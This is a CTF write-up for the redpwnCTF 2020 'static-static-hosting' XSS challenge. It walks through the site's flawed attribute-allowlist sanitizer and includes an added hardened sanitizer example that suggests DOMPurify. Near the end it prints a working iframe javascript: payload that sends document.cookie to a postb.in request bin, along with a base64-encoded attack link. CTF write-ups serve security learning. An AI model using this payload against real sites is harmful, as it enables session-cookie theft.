static-static-hosting

redpwnCTF 2020 web

This is another XSS challenge where we have to get past yet another filter.

the filter

In the browser's network tab, we can find the filter that is applied to our input.

function clean(input) {
    const template = document.createElement('template');
    const html = document.createElement('html');
    template.content.appendChild(html);
    html.innerHTML = input;

    sanitize(html);

    const result = html.innerHTML;
    return result;
}

function sanitize(element) {
    // Only attribute *names* are allowlisted; the attribute values are never inspected
    const attributes = element.getAttributeNames();
    for (let i = 0; i < attributes.length; i++) {
        // Let people add images and styles
        if (!['src', 'width', 'height', 'alt', 'class'].includes(attributes[i])) {
            element.removeAttribute(attributes[i]);
        }
    }

    // Only <script> elements are dropped; every other tag is kept and recursed into
    const children = element.children;
    for (let i = 0; i < children.length; i++) {
        if (children[i].nodeName === 'SCRIPT') {
            element.removeChild(children[i]);
            i --;
        } else {
            sanitize(children[i]);
        }
    }
}

Basically, this means that we can only use src, width, height, alt and class as attributes, and <script> elements get removed; every other tag is kept. This still gives us a lot of room to work with.

Embed and iframe

I thought about the <embed> and <iframe> tags, as their src attribute can trigger JavaScript.
However, when I tried, <embed> worked for me on my local computer but not on the bot, as I am running Firefox and the bot is running Chrome. But <iframe> worked for both.

iframe

<iframe src="javascript:alert(1)"></iframe>

And it worked! So the next step is the usual PostBin move: exfiltrate document.cookie to a request bin.
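From the defender's side, the bypass works because the challenge's sanitize() allowlists attribute names but never looks at their values, and removes only <script> while leaving <iframe>, <embed> and friends in place. The block below is an added example, not the challenge's code or the author's: it allowlists element names as well as attribute names, validates src with the WHATWG URL parser so that javascript: (including whitespace, tab and case tricks) is rejected, and uses a small constructed Element stand-in, makeElement(), so it runs under Node without a browser. The contents of ALLOWED_TAGS, ALLOWED_ATTRS and ALLOWED_SCHEMES are choices made for this illustration.

```javascript
// Added example, not the challenge's code: a hardened version of the
// challenge's sanitize(). It fixes the two gaps the bypass relies on:
//  1. attribute names were allowlisted but values never checked, so
//     src="javascript:..." survived;
//  2. only <script> was removed, so <iframe>/<embed>/<object> passed through.
// ALLOWED_TAGS, ALLOWED_ATTRS and ALLOWED_SCHEMES are choices made for this
// example (assumption), and makeElement() is a constructed stand-in for a DOM
// Element so the code runs offline in Node; in a browser, pass real elements.

const ALLOWED_TAGS = new Set(['DIV', 'P', 'SPAN', 'B', 'I', 'IMG', 'BR']);
const ALLOWED_ATTRS = new Set(['src', 'width', 'height', 'alt', 'class']);
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

// Validate a URL-valued attribute by parsing it with the WHATWG URL parser
// (the global URL in both Node and browsers). The parser strips leading and
// trailing whitespace, removes embedded tabs/newlines and lower-cases the
// scheme, so " JaVa\tScRiPt:" is recognised as javascript: and rejected.
function isSafeUrl(value) {
  let url;
  try {
    // Relative URLs resolve against the https base and are therefore allowed
    url = new URL(value, 'https://example.invalid/');
  } catch {
    return false; // unparsable: reject rather than guess
  }
  return ALLOWED_SCHEMES.has(url.protocol);
}

// Walk the tree. Elements whose tag is not allowlisted are removed outright
// (not just SCRIPT), disallowed attributes are dropped, and src values must
// pass isSafeUrl(). Children are snapshotted with Array.from() so removals
// during the loop need no index adjustment.
function sanitize(element) {
  for (const name of element.getAttributeNames()) {
    if (!ALLOWED_ATTRS.has(name)) {
      element.removeAttribute(name);
    } else if (name === 'src' && !isSafeUrl(element.getAttribute(name))) {
      element.removeAttribute(name);
    }
  }
  for (const child of Array.from(element.children)) {
    if (!ALLOWED_TAGS.has(child.nodeName)) {
      element.removeChild(child);
    } else {
      sanitize(child);
    }
  }
}

// Constructed minimal Element stand-in exposing only the DOM methods the
// sanitizer uses (assumption: enough to demonstrate behaviour, not a real DOM).
function makeElement(nodeName, attrs = {}, children = []) {
  return {
    nodeName: nodeName.toUpperCase(),
    attrs: { ...attrs },
    children: [...children],
    getAttributeNames() { return Object.keys(this.attrs); },
    getAttribute(name) { return this.attrs[name]; },
    removeAttribute(name) { delete this.attrs[name]; },
    removeChild(child) { this.children = this.children.filter((c) => c !== child); },
  };
}

// Serialise a stand-in tree so the result of sanitize() can be inspected
// (void elements get a closing tag here; that is only for readability).
function toHtml(el) {
  const tag = el.nodeName.toLowerCase();
  const attrs = el.getAttributeNames().map((n) => ` ${n}="${el.getAttribute(n)}"`).join('');
  return `<${tag}${attrs}>${el.children.map(toHtml).join('')}</${tag}>`;
}

// Constructed input: the challenge's iframe payload shape, an <img> with an
// obfuscated javascript: src plus an event handler, and a benign image.
function demo() {
  const root = makeElement('div', {}, [
    makeElement('iframe', { src: 'javascript:alert(1)' }),
    makeElement('img', { src: ' JaVa\tScRiPt:alert(1)', onerror: 'alert(1)', alt: 'x' }),
    makeElement('img', { src: 'https://cdn.example/a.png', width: '10' }),
  ]);
  sanitize(root);
  return toHtml(root);
}

console.log(demo());
```

Running it with node prints a <div> containing only the two <img> elements, with the obfuscated javascript: src and the onerror handler stripped and the iframe gone entirely. The value check, not the name check, is what stops the challenge payload; in production code the sensible choice is a maintained sanitizer such as DOMPurify rather than a hand-rolled allowlist like this one.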

Payload

I base64-encoded my payload, put it in the URL fragment and fed the link to the bot. Moments later, I got the flag.

<iframe src="javascript:window.location.assign(`https://postb.in/1593716639876-9019670642446?cookie=${document.cookie}`)"></iframe>
https://static-static-hosting.2020.redpwnc.tf/site/#PGlmcmFtZSBzcmM9ImphdmFzY3JpcHQ6d2luZG93LmxvY2F0aW9uLmFzc2lnbihgaHR0cHM6Ly9wb3N0Yi5pbi8xNTkzNzE2NjM5ODc2LTkwMTk2NzA2NDI0NDY/Y29va2llPSR7ZG9jdW1lbnQuY29va2llfWApIj48L2lmcmFtZT4=
flag{wh0_n33d5_d0mpur1fy}